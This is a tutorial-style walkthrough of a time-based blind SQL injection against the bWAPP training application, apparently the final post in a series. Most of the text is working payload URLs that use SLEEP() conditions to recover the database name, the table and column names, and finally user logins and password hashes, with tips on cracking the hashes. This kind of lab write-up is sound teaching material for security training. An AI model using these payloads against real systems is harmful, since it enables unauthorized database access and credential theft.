In this post we exploit a time-based blind SQL injection. I will only give the final query and its result at each step, because the procedure is the same as for boolean-based blind SQLi: the only difference is that, when the injected condition is true, we ask the database to sleep for a chosen number of seconds instead of looking for a change in the page content.
Open bWAPP 2.2 and visit the page “SQL Injection — Blind — Time-Based” as shown below. The functionality is the same as before: it searches whether a movie is present in the database.
Now start the Burp Suite proxy and use its embedded browser. Forward the normal search request to Repeater.
Now let’s check whether the parameter is vulnerable to time-based SQLi. I used the payload "IRON MAN' AND SLEEP(10)-- " (note the trailing space after the two dashes, which MySQL needs to treat the rest of the query as a comment). If the movie is present, the response takes about 10 seconds to come back: MySQL evaluates the right-hand side of AND only for rows where the left-hand side is true, so SLEEP() fires once per matching row. Use a title that matches exactly one movie, otherwise the delay is multiplied.
Now let’s see what happens if the movie is not in the database and we still ask it to sleep for 10 seconds.
The movie is not in the database, so there is no delay: the left side of the AND is false and SLEEP() is never reached.
These two requests prove that the application is vulnerable to time-based SQLi.
Now let’s first find the name of the current database. I will use Burp Intruder for this, sorting the results by response time; I assume you know how to use it.
From Intruder’s results I can say that the database name is 5 characters long. The query in Repeater looks like below.
Now that we know the length of the database name, let’s find the name itself.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+database())+LIKE+"bwapp%",SLEEP(10),NULL)+--+&action=search
Now let’s find out the number of tables in the database.
After that we need the names of the tables in the database. For this I will use the LIMIT clause, as before.
The first table’s name is 4 characters long:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+0,1)=4,SLEEP(10),NULL)+--+&action=search
The second table’s name is 6 characters long:
The third table’s name is 6 characters long:
The fourth table’s name is 5 characters long:
The fifth table’s name is 8 characters long:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+4,1)=8,SLEEP(10),NULL)+--+&action=search
After this, we need to find the name of each table.
First table is: blog (4 characters, matching the length found above)
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+0,1)+LIKE+"blog%",SLEEP(10),NULL)+--+&action=search
Second table is: heroes
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+1,1)+LIKE+"heroe%",SLEEP(10),NULL)+--+&action=search
Third table is: movies
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+2,1)+LIKE+"movies%",SLEEP(10),NULL)+--+&action=search
Fourth table is: users
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+3,1)+LIKE+"users%",SLEEP(10),NULL)+--+&action=search
Fifth table is: visitors
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+4,1)+LIKE+"visitors%",SLEEP(10),NULL)+--+&action=search
We have the names of all five tables; we are interested in the “users” table. To extract data from it, we need the number of columns in users.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+count(*)+FROM+information_schema.columns+WHERE+table_schema=database()+AND+table_name='users')=9,SLEEP(10),NULL)+--+&action=search
There are 9 columns in the users table. Now we need the length of each column name; we use the LIMIT clause again.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(column_name)+FROM+information_schema.columns+WHERE+table_schema=database()+AND+table_name='users'+LIMIT+0,1)=2,SLEEP(10),NULL)+--+&action=search
Similarly, by changing the LIMIT offset, we extract the length of every column name in the users table.
After that we need the column names themselves. I was able to find them as below.
Now that we know the column names, we are interested in login and password. The length of the first user’s login can be found with:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(login)+FROM+users+LIMIT+0,1)=6,SLEEP(10),NULL)+--+&action=search
The length of the second user’s login can be found the same way, with LIMIT 1,1.
Now let’s find the login names. The final queries for the first and second users are:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+login+FROM+users+LIMIT+0,1)+LIKE+"a.i.m.%",SLEEP(10),NULL)+--+&action=search
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+login+FROM+users+LIMIT+1,1)+LIKE+"bee%",SLEEP(10),NULL)+--+&action=search
So we have the user names; now we need their passwords. With the query below we can find the first user’s password hash. It is a hash, not the password itself, so once the whole value is recovered it still has to be cracked offline (its length tells you the likely algorithm: a 40-character hexadecimal value is usually SHA-1).
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+password+FROM+users+LIMIT+0,1)+LIKE+"68%",SLEEP(10),NULL)+--+&action=search
Change the characters in the LIKE clause with Intruder to recover the whole hash for the first user; if the hash is hexadecimal, the character set 0-9a-f keeps the search small. Keep in mind that LIKE is case-insensitive under MySQL’s default collations and that _ and % are wildcards, so a prefix like "a.i.m.%" cannot tell you the case of the stored value. For the second user, change the 0 in the LIMIT clause to 1 and repeat the procedure.
This is how a time-based blind SQL injection is exploited.
I hope you liked the whole series.